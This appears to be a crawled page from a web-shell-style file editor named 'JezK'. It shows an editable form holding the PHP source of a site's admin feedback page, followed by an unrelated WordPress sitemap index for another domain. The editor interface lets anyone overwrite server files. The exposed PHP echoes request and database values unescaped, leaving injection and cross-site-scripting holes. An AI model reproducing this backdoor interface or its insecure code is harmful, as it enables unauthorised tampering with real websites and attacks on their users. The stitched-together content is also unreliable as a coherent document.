
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: feedback_view.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
	include &quot;./app/admin_functions.php&quot;;
	$admin=new admin();
	$feedbackUserName='';
	$feedbackUserMobile='';
	$feedbackUserName='';
	
	if(isset($_GET['id']))
	{
		$feedbackId=$_GET['id'];
		$feedbackData=$admin-&gt;getFeedbackData($feedbackId);
		$feedbackUserId=$feedbackData['donar_id'];
		$feedbackUserData=$admin-&gt;getDonorData($feedbackUserId);
		$feedbackUserName=$feedbackUserData['username'];
		$feedbackUserMobile=$feedbackUserData['mobilenumber'];
		$feedbackMessage=$feedbackData['message'];
	}
	
	
	
	
    $current_page='feedback';
    $current_heading='Feedback';
	include 'header.php';
?&gt;
&lt;style&gt;
	.feedback-message
	{
		padding:5px;
		border:2px solid gray;
		max-height:50vh;
		overflow-y:scroll;
		
	}
&lt;/style&gt;
	&lt;div class='contain container-fluid'&gt;
		&lt;div class='pull-right bttn'&gt;
			&lt;a href='feedback.php'&gt;&lt;input type='button' class='btn btn-info ' value='BACK'&gt;&lt;/a&gt;
		&lt;/div&gt;
		&lt;br&gt;	
		&lt;div class=&quot;view col-md-12 col-sm-12 col-xs-12&quot;&gt;
			&lt;h5 class=&quot;col-md-12 col-sm-12 col-xs-12&quot;&gt;&lt;b class=&quot;col-md-1 col-sm-1&quot;&gt;Name:&lt;/b&gt;&lt;span class=&quot;col-md-3 col-sm-3&quot;&gt; &lt;?php echo $feedbackUserName; ?&gt;&lt;/span&gt;&lt;/h5&gt;
			&lt;h5 class=&quot;col-md-12 col-sm-12 col-xs-12&quot;&gt;&lt;b class=&quot;col-md-1 col-sm-1&quot;&gt;Mobile:&lt;/b&gt;&lt;span class=&quot;col-md-3 col-sm-3&quot;&gt;&lt;?php echo $feedbackUserMobile; ?&gt;&lt;/span&gt;&lt;/h5&gt;
			&lt;div class=&quot;col-md-12 col-sm-12 col-xs-12&quot;&gt;
				&lt;h5 class=&quot;&quot;&gt;&lt;b&gt;FeedBack Message&lt;/b&gt;&lt;/h5&gt;
				&lt;div class=&quot;feedback-message col-md-8 col-sm-12 col-xs-12&quot;&gt;
					&lt;p class=&quot;text-justify&quot;&gt;&lt;?php echo $feedbackMessage; ?&gt;&lt;/p&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt; 
	&lt;/div&gt;
&lt;hr&gt;
&lt;?php
	include 'footer.php';
?&gt;
&lt;script type='text/javascript'&gt;
function confirmDelete()
{
   return confirm(&quot;Are you sure you  want to delete feedback message?&quot;);
}
&lt;/script&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://satyadevaresidency.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-gallery-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-testimonial-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-gallery_cat-1.xml</loc></sitemap></sitemapindex>
